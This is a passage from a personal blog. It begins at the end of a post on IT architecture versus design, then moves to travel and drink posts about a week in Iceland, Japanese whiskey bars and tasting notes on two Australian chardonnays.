Having skills in both disciplines can sometimes be challenging, but for effective and efficient IT in a mid-to-large-size organisation, both architecture and design are essential to arrive at appropriate, useful, maintainable solutions, when both are in use and in appropriate balance.

Final Thoughts

I have worked from technician to designer to solution architect to domain architect, and seen the benefits and limitations of all of these roles. I believe, perhaps slightly egocentrically, that having experience in all areas helps round out what is needed for the organisation. Whilst in large organisations these roles are typically filled by different people or groups, they can be a single person or group.

Whilst it is often important to deliver to the goals and objectives of a specific project, being able to ensure this aligns with the organisation’s overall strategy and leaves minimal tech debt (gap) is more ideal. I have briefly discussed this in a previous post, IT Architecture Process.

I guess the answer is that both architecture and design are important, one may be more so depending on the situation, and they are often not disparate skills; more focus or weight can be applied to one area over the other, depending on what problem is being solved.

The land of Elves and Vikings

It has been a long while since I posted anything. What can I say, life got busy.

I’ve moved to another country for work. Whilst this is not the first time I’ve worked in another country, it is the first where I’ve not had a firm end date in mind. To make it even more scary, it’s a country where I don’t speak the language, so no idea how that is going to work out, but audentes Fortuna iuvat (fortune favours the bold)…

Anyway, as I read over some of my previous posts, cringing at the horrendous grammar and punctuation, the OCD part of me wanted to rewrite it all. But the lazy, don’t-give-a-crap part of me, as often happens, won out, and I’ve decided to accept my ineptitude.

As I considered what to write next, as I have dozens of half-formed posts, I realised many of them are about IT or wine, and not many are about books or travel, which are some of my other interests. I think I generally shy away from these topics as they reveal more of me, and I’m just a shy guy.

But riding on the courage of my recent move to another country I’ve decided to post a bit more about travel and my experiences and of course about some of the wine, whiskey and sake I’ve enjoyed along the way.

These posts will be in no chronological order, as again I am too lazy, so I will start with a recent trip I made to the land of ice, which turned out to be very green.

Iceland
I spent a week in Iceland and I must admit, it is like no other place I have ever been. Although, to be honest, this was my second time in Iceland; the first was spent in a hotel and office with brief but exhilarating car rides in between, so I feel that trip does not count.

Iceland was cold, no surprise there, but what is perhaps a little surprising is the lack of ice. The country (admittedly only the half I saw) is covered, for the most part, by bright green moss, which grows fervently over the volcanic rocks.

Much like this:

[photo: bright green moss covering the volcanic rock]

It is bad form to walk on the moss, as this be the domain of elves, but otherwise it is used for everything from flavouring alcoholic beverages to an ingredient in bread, medicine and skin care, or, in an emergency, as a food source.

I didn’t try it myself in its purest form but many products in Iceland contain it.

Another noticeable thing about Iceland is the waterfalls. They are dotted around the country in many forms and shapes, but all hold some wonder, like: where does all that water come from? Errr, maybe the gigantic glaciers seen in the background of the above photo, perhaps?

[photo: waterfalls]

The capital and largest city of Iceland is Reykjavík, which is as colourful as its inhabitants.

[photo: Reykjavík]

Whilst the climate is much too cold to grow vines and produce wine, it is not too cold to produce beer, which tends to be adorned with some visage of the Icelanders’ proud (if you don’t think too deeply about it) heritage of vikings.

This beverage is enhanced with what turned out to be a local favourite cuisine, otherwise known as hotdogs. But I must admit these are not quite like any other hotdog I’ve had elsewhere, and are very good.

[photo: Icelandic beer and hotdogs]

When I’d had my fill of the local beer and enough to eat, I took a nice stroll along one of the amazing black (volcanic) sand beaches, where I finally came across some ice, perhaps not exactly where I had expected to find it, but it was nonetheless beautiful.

[photo: ice on the black sand beach]

Finally, and probably what most people come to Iceland for, the awe-inspiring Northern Lights, or Aurora Borealis. Unfortunately, not having a decent camera on hand, the photos I took cannot do it justice. But I would wholeheartedly encourage everyone to make the trip to see these breathtaking lights in the sky!

[photo: the Northern Lights]

More trips to follow!

Whiskey in the land of the rising sun

When I first came to Japan, around 2006, it was for just a brief 4-night stopover on my way back from the US. I was young and even more naive back then (now I’m older but probably just as naive) and did not appreciate whiskies as much as I do now. However, I had read about Japanese whiskey and was keen to try some whilst in Japan. Back then, finding aged Japanese whiskey was relatively simple; it could even be found in the local electrical goods store?!

At this point my experience with whiskey was largely limited to those produced in Scotland and Ireland, and given my budget, I tended to drink what was perhaps not the best representation from these locations.

Whilst I do not think that whiskey needs to be aged or expensive to be good (just like wine, there are some very good cheap, young examples), given my knowledge of the subject at the time I perhaps did not yet have the understanding to seek these examples out.

Anyway, as I mentioned, I was in Japan for a few days and intent on trying some of the local whiskeys. I didn’t have it in mind at the time to buy any bottles, but rather wanted to find some little hidden bars where I could sample a variety of what Japan had to offer. To my surprise the bars offered some very good aged local whiskey at a very reasonable price. The rest is slightly blurred… with time, obviously.

On my next visit to Japan a few years later, recalling the great experience I had, I decided to buy a couple of bottles of whiskey, which from memory were the 21yo Nikka Pure Malt and an 18yo Yamazaki, and which I believe cost me around $100 to $150 AUD at the time.

[photo: the Nikka Pure Malt and Yamazaki bottles]

After drinking these in Aus with some friends, alongside some good Scotch, it became apparent how good these Japanese whiskies were. On subsequent trips to Japan I always tried to take some time to explore and find a bar to try some local whiskey. I also discovered that the owners of these bars, who were typically the same people serving the whiskey, were very interesting characters. It somehow seemed possible to share our passion for whiskey despite the language barrier; perhaps after a few glasses it became easier, or perhaps the primal incoherence of whiskey-addled humans is universal.

More recently, from around 2014, Japanese whiskey became very popular globally, and unfortunately finding those cheap aged bottles became very hard, and typically very expensive. However, for those of us determined enough, there are still some small bars which pour great old whisky for a reasonable price.

A recent example of this is my last couple of trips to Japan, where I found these on offer. They are obviously not local, but when Japanese whiskey is not available, some old and unique bottles of Scotch can still be found, such as these:

[photo: old bottles of Scotch]

Japan has a warm place in my heart, and not just from the whiskey, but as a place where a little dark bar seating only about 10 people can be found in the middle of the city, on a crowded street filled with lights and high-rise buildings, with the owner still pouring whiskey at prices representative of what they were when he bought the bottles many years ago.

Chardy Season

I’ll admit it, I’m a big fan of Chardonnay! I think it is one of the world’s best white wine grapes (though I might prefer French/German Riesling?) but, for Australia, perhaps the best white wine grape.

However for Australia specifically it has not always been so…

Back in the late ’90s and early 2000s, when I was getting into wine a bit more seriously, I started drinking chardonnay, as at that time, and I believe it is still true now, it was Australia’s most widely planted, consumed and exported white variety. However, it was around this time that a lot of Australian chardonnays were not very good; in fact they were pretty bad.

In the late ’80s and early ’90s, demand for chardonnay exceeded supply. Most of the fruit was grown in warmer climates and was heavily oak treated, leading to strong, simple and heavy, buttery, sometimes caramel-like flavours, which most wine drinkers, including myself, did not like, and thus stopped consuming. This in turn sparked the early-2000s “unwooded” chardonnay trend, which was notable for its blandness and, to my mind, confirmed that most Australian chardonnays were not very good.

That said, during this time there were obviously still some good, if not great, chardonnays being produced by the likes of Giaconda, Penfolds, Leeuwin Estate, Voyager Estate and others, but for the most part these were top-end chardonnays, mostly outside of my price range, and not worth the gamble.

However, I remember getting a bottle of 1997 Voyager Estate Margaret River Chardonnay as a gift, which I kept in a cupboard in the centre of the house for many years, as I was not too interested in wine at that stage. A few years later a friend and I shared a bottle of 2003 Voyager Estate Chardonnay. I was blown away by how good it was: intense melon, nectarine and pineapple, with well-integrated quality French oak. I went back and opened that 1997 Voyager Estate Chardonnay, and it still showed some primary fruit flavours such as pear and fig, but had also developed creamy, hazelnut, toffee (crème brûlée) secondary flavours. This inspired my love for chardonnay, which I still drink a lot of to this day.

Thankfully in the last 15 or so years, chardonnay has become one of Australia’s best grape varietals and my love of this grape has never been stronger.

So, as the warmer seasons are now upon us, what better excuse (surely no excuse is needed) to drink some of my favourite Australian chardonnay. Let’s start with the Oakridge Local Vineyard Series Guerin Vineyard Chardonnay 2013 and a Voyager Estate Chardonnay 2006.

[photo: the two chardonnays]

Oakridge make a lot of great Pinot and Chardonnay and are situated in Victoria’s Yarra Valley, which is known for producing great examples of both these varieties. It is one of Australia’s oldest wine regions, dating back to the mid-1800s.

The Oakridge LVS Guerin Vineyard Chardonnay 2013 is whole-bunch pressed, matured on lees and then put into 500-litre French oak puncheons for 11 months. It has a distinctive Oakridge perfume and taste (which is a good thing), with nectarine and pear on the nose, which are also reflected on the palate with added citrus and spice and a touch of flint and cashew. It has a slight straw colour, almost with a hint of green, and is still tight, but delivers on flavour and mouthfeel, with enough complexity to keep for another 5 years.

In summary, a great example of Yarra Valley Chardonnay, and with the LVS being Oakridge’s mid-range wines, a reasonable price. – Score: 96/100.

The Voyager Estate Chardonnay 2006 is one that has been sitting in my cellar for about 8 years, and thus obviously has more age to it, but it is singing right now.

It has that typical Margaret River grapefruit and citrus bouquet. The palate also showed grapefruit and citrus, with a touch of vanilla and pear. The texture was light, well balanced and creamy, with well-integrated acid and a long, buttery finish with a touch of minerality and honeysuckle. – Score: 96/100.

I drank both these wines over two nights, and whilst both are great examples of the chardonnay Australia is now producing, I felt the Voyager Estate definitely benefited from its longer bottle age, which allowed it to mellow slightly, whilst the Oakridge shone on the second night.

Anyway, I am getting thirsty thinking about these two great chardys and am already looking over at my wine fridge to see what will be next.